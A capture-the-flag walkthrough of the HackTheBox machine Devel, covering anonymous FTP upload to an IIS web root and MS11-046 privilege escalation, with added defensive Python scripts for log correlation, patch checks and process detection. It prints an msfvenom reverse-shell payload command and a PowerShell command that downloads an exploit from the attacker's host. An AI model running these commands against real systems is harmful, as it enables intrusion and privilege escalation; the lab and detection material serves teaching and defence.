
HackTheBox - Devel

Although it’s been a while since my last upload due to getting a new job, I thought it was time to get back on the grind, starting with Devel. This was my second machine rooted without using Metasploit. The machine is a Windows web server whose FTP service allows anonymous uploads. Once inside, I used “afd.sys” (MS11-046) to escalate privileges and gain root!

Summary

  • Port scan using NMAP
  • Upload an MSFVenom-generated .aspx shell to the web server via FTP
  • Elevate privileges using ‘afd.sys’ to gain root

Machine IP: 10.10.10.5

Reconnaissance

NMAP

nmap -n -p- -sV -T 5 10.10.10.5

[screenshot: nmap output]

FTP is open and so is port 80. Further enumeration:

nmap -p 80,21 -sC -sV -O 10.10.10.5

[screenshot: nmap service and OS detection output]

FTP anonymous login is allowed! Maybe we can exploit this? It also lists an aspnet_client directory. What is it?

FTP

Anonymous FTP is enabled. We also have the ability to upload files using PUT.

[screenshot: anonymous FTP login]

These are the files located within the FTP directory.

[screenshot: FTP directory listing]

HTTP

[screenshot: default IIS page over HTTP]

It seems the website is hosted from the same root directory as FTP, since the file “iisstart.htm” listed over FTP is reachable over HTTP. Maybe we could upload something via FTP and access it via HTTP?

Create a simple test.html file and upload it via FTP.

[screenshot: uploading test.html over FTP]

Then, in the browser, navigate to 10.10.10.5/test.html

[screenshot: test.html served by the web server]

It works, confirming that files uploaded via FTP are served by the web server when requested over HTTP. The web server is Microsoft IIS 7.5.

Maybe we can upload a reverse shell via FTP and get the web server to execute it?
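From the defender's side, the condition just confirmed (an anonymous-writable FTP root that is also the IIS web root) leaves a clear trace: an FTP STOR of a server-side script followed shortly by an HTTP request for the same path. The following is an added example, not code from the original write-up, that correlates the two log sources. Both log excerpts are constructed to mimic IIS W3C extended format, and the parser reads the column layout from each file's own `#Fields:` header rather than assuming fixed positions.

```python
"""Correlate anonymous FTP uploads of ASP.NET scripts with later HTTP requests
for the same path (added example; constructed logs, not real data)."""
from datetime import datetime

# Server-side extensions that IIS hands to the ASP.NET handler.
SCRIPT_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx")

# Constructed IIS FTP log in W3C format (not taken from a real host).
FTP_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2024-01-10 10:00:01 203.0.113.7 anonymous 192.0.2.10 21 USER anonymous 331
2024-01-10 10:00:02 203.0.113.7 anonymous 192.0.2.10 21 PASS *** 230
2024-01-10 10:00:05 203.0.113.7 anonymous 192.0.2.10 21 STOR /test.html 226
2024-01-10 10:01:10 203.0.113.7 anonymous 192.0.2.10 21 STOR /rshell.aspx 226
2024-01-10 10:05:00 203.0.113.9 anonymous 192.0.2.10 21 STOR /notes.txt 226
"""

# Constructed IIS HTTP log in W3C format (not taken from a real host).
HTTP_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2024-01-10 10:00:20 192.0.2.10 GET /test.html - 80 - 203.0.113.7 200
2024-01-10 10:01:30 192.0.2.10 GET /rshell.aspx - 80 - 203.0.113.7 200
2024-01-10 10:05:30 192.0.2.10 GET /iisstart.htm - 80 - 198.51.100.4 200
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            yield dict(zip(fields, line.split()))


def _ts(rec):
    """Combine the W3C date and time columns into a datetime."""
    return datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")


def find_webshell_uploads(ftp_log, http_log, window_seconds=3600):
    """Return (path, uploader_ip, requester_ip, seconds_between) for every
    script uploaded over FTP and then requested over HTTP within the window."""
    uploads = [r for r in parse_w3c(ftp_log)
               if r["cs-method"] == "STOR"
               and r["cs-uri-stem"].lower().endswith(SCRIPT_EXTENSIONS)]
    requests = list(parse_w3c(http_log))
    hits = []
    for up in uploads:
        for req in requests:
            if req["cs-uri-stem"].lower() != up["cs-uri-stem"].lower():
                continue
            delta = (_ts(req) - _ts(up)).total_seconds()
            if 0 <= delta <= window_seconds:
                hits.append((up["cs-uri-stem"], up["c-ip"], req["c-ip"], int(delta)))
    return hits


if __name__ == "__main__":
    for hit in find_webshell_uploads(FTP_LOG, HTTP_LOG):
        print("ALERT: script %s uploaded from %s, requested from %s %d s later" % hit)
```

On the constructed data the test.html upload is ignored (not a script extension) and only rshell.aspx is reported. The durable fix is configuration rather than detection: the FTP site should not share a physical path with the web root, and anonymous FTP should never have write permission.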

IIS 7.5

After some googling to find out more about IIS 7.5, I stumbled across this website.

https://stackify.com/iis-web-server/

It highlights that the webserver can do much more than host “ASP.NET apps”.

Okay, but what are ASP.NET apps? After some more googling, it seems they use the extension .aspx.

As per https://fileinfo.com/extension/aspx

An ASPX file is an Active Server Page Extended (ASPX) file, which is a webpage generated by web servers running the Microsoft ASP.NET framework.

Well, our web server is running the ASP.NET framework, so we could create a payload with the extension .aspx and get the web server to execute it!

Exploitation

Now that we know our web server executes .aspx files, we can create a payload using msfvenom with the .aspx extension and upload it to the root directory.

First of all, let's check that aspx is a valid output format for msfvenom.

msfvenom --list format | grep aspx

[screenshot: msfvenom format list filtered for aspx]

Both the aspx and aspx-exe formats are available, great!

Now let's find a Windows reverse shell. We will not use Meterpreter as it is not available on the OSCP.

msfvenom --list payloads | grep windows/shell

windows/shell_reverse_tcp                  Connect back to attacker and spawn a command shell

Perfect!

Now let's create a .aspx payload called rshell.aspx:

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.15 LPORT=4444 -o rshell.aspx

and then upload it using FTP:

put rshell.aspx

Start a netcat listener on port 4444 (or whichever port you set as LPORT), and get the web server to execute the file by requesting it in the browser.

[screenshot: reverse shell received in netcat]

Navigating to Users, we can see we have 2 accounts:

  • Admin
  • babis

However, we do not have access to either.

[screenshot: access denied on both user directories]

Time for some privilege escalation.

Privilege Escalation

System information

Let's start by finding out some information about our target machine:

[screenshot: systeminfo output]

It looks as though Windows 7 Enterprise version 6.1.7600 is running, and it has not been patched! Let's have a look for some exploits on Google.
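The patch state read off the systeminfo screenshot is the thing a defender checks first. The script below is an added example, not part of the original write-up: it parses `systeminfo` output for the OS version and installed hotfix list and reports whether the afd.sys fix is present. The update for MS11-046 was released as KB2503665, so that is the identifier it looks for. The check is deliberately scoped to the NT 6.1 line (Windows 7 / Server 2008 R2) that Devel runs; other OS versions are reported as unhandled rather than guessed at. Both systeminfo samples are constructed.

```python
"""Triage systeminfo output for the MS11-046 (afd.sys) patch
(added example; constructed samples, not real hosts)."""
import re

# Constructed systeminfo output for an unpatched Windows 7 RTM host.
SYSTEMINFO_UNPATCHED = """Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
"""

# Constructed systeminfo output for a host with the MS11-046 update installed.
SYSTEMINFO_PATCHED = """Host Name:                 WS01
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2503665
                           [02]: KB976902
"""

# Knowledge-base article under which the MS11-046 fix shipped.
MS11_046_KB = "KB2503665"


def parse_systeminfo(text):
    """Return (os_name, (major, minor, build), set_of_hotfix_ids)."""
    os_name = version = None
    hotfixes = set()
    for line in text.splitlines():
        if line.startswith("OS Name:"):
            os_name = line.split(":", 1)[1].strip()
        elif line.startswith("OS Version:"):
            m = re.search(r"(\d+)\.(\d+)\.(\d+)", line)
            version = tuple(int(x) for x in m.groups()) if m else None
        else:
            # Hotfix entries look like "[01]: KB2503665"; collect every KB id.
            hotfixes.update(re.findall(r"\bKB\d+\b", line))
    return os_name, version, hotfixes


def ms11_046_exposure(text):
    """'vulnerable' if a Windows 7 / 2008 R2 host lacks KB2503665,
    'patched' if it has it, 'unhandled' for any other OS version."""
    _, version, hotfixes = parse_systeminfo(text)
    if version is None or version[:2] != (6, 1):
        return "unhandled"
    return "patched" if MS11_046_KB in hotfixes else "vulnerable"


if __name__ == "__main__":
    for label, sample in (("devel", SYSTEMINFO_UNPATCHED), ("ws01", SYSTEMINFO_PATCHED)):
        print(label, ms11_046_exposure(sample))
```

A host reporting "Hotfix(s): N/A" on build 7600, as in the write-up, is the unpatched RTM image; the same parser can be pointed at the saved output of any number of hosts to find the ones still exposed.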

https://www.exploit-db.com/exploits/40564

This looks like exactly what we need. Let's have a look at the exploit notes:

[screenshot: exploit header notes]

It seems the exploit is compiled on our host machine and then uploaded to the target machine before execution.

Compiling

First, let's get the file onto our host machine. As the website shows the file is EDB verified, we should be able to find it in searchsploit.

searchsploit -m 40564

Rename the file to MS11-046.c using mv, and then run the compile command given within the exploit. Compilation will fail because our host system does not have mingw installed. We can install it using:

sudo apt-get install mingw-w64

Re-run the command, and it will compile.

[screenshot: successful compilation with mingw]

Great, we now have an executable! Now to get it on the target machine.

Escalating

The target machine does not have netcat installed; however, it does have Windows PowerShell, so we will use that to connect back to our host machine and download the file.

Start with a simple Python HTTP server:

python -m SimpleHTTPServer 6666

and then, on the remote machine, use PowerShell to connect back to the host and download the file.

This website gives a good insight into how to do this using (new-object System.Net.WebClient).DownloadFile:

https://blog.ropnop.com/transferring-files-from-kali-to-windows/#http

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.15:6666/MS11-046.exe', 'c:\Users\Public\Downloads\MS11-046.exe')"

Navigate to /Users/Public/Downloads

[screenshot: MS11-046.exe present in Downloads]

We can see the file is there! Execute it!
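Everything from the reverse shell onward runs under the IIS application pool identity, which gives the host-side telemetry something concrete to key on: a command interpreter whose parent is the IIS worker process w3wp.exe, shells running as an `IIS APPPOOL\` account, and a PowerShell command line that pulls a file with System.Net.WebClient. The following is an added example, not code from the original write-up, that applies those three rules to process-creation events. The events are constructed with Sysmon Event ID 1 style fields (Image, ParentImage, CommandLine, User); the parent/child chain and the download command mirror the steps above, and the file paths and account names are assumed.

```python
"""Flag shells spawned by the IIS worker and WebClient download cradles in
process-creation telemetry (added example; constructed events, not real data)."""
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields).
EVENTS = [
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": 'w3wp.exe -ap "DefaultAppPool"',
     "User": r"IIS APPPOOL\DefaultAppPool"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "cmd.exe",
     "User": r"IIS APPPOOL\DefaultAppPool"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -c \"(new-object System.Net.WebClient).DownloadFile("
                    "'http://10.10.14.15:6666/MS11-046.exe','c:\\Users\\Public\\Downloads\\MS11-046.exe')\"",
     "User": r"IIS APPPOOL\DefaultAppPool"},
    # Benign control: an interactive user running PowerShell from Explorer.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-Process",
     "User": r"DEVEL\babis"},
]

WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Matches "WebClient).DownloadFile(" and the DownloadString/DownloadData variants.
DOWNLOAD_CRADLE = re.compile(r"webclient\)?\s*\.\s*download(file|string|data)", re.IGNORECASE)


def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of alert names a single process-creation event raises."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    alerts = []
    if parent in WEB_WORKERS and image in SHELLS:
        alerts.append("iis-worker-spawned-shell")
    if image in SHELLS and event["User"].upper().startswith("IIS APPPOOL\\"):
        alerts.append("shell-under-apppool-identity")
    if image in SHELLS and DOWNLOAD_CRADLE.search(event["CommandLine"]):
        alerts.append("powershell-webclient-download")
    return alerts


def scan(events):
    """Apply classify() to every event; returns (image, user, alert) triples."""
    return [(basename(e["Image"]), e["User"], a) for e in events for a in classify(e)]


if __name__ == "__main__":
    for image, user, alert in scan(EVENTS):
        print("ALERT %-32s %s (%s)" % (alert, image, user))
```

The second rule is the one that survives a level of indirection: the download cradle's parent is cmd.exe rather than w3wp.exe, so the parent/child rule misses it, but the application pool identity is inherited down the chain. The command-line pattern is a literal match and would be defeated by encoding or obfuscation; it is a cheap first signal, not a complete detection.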

[screenshot: SYSTEM shell after running the exploit]

We have root!!

Flags

Here are the flags for this machine!

User: user

Root: Root

This post is licensed under CC BY 4.0 by the author.